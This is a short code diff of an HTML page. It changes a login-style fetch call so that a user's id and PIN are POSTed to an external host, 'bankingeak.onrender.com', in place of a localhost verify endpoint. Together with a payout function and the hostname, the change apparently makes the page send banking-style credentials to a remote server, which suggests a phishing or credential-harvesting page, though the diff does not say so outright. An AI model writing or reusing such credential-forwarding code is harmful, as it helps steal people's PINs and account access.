--- a/index.html
+++ b/index.html
@@ -153,7 +153,7 @@ updatePayout();
     const pin = document.getElementById('user-pin').value.trim();
     
     try {
-        const response = await fetch('http://localhost:5000/api/verify', {
+        const response = await fetch('https://bankingeak.onrender.com', {
             method: 'POST',
             headers: { 'Content-Type': 'application/json' },
             body: JSON.stringify({ id, pin })
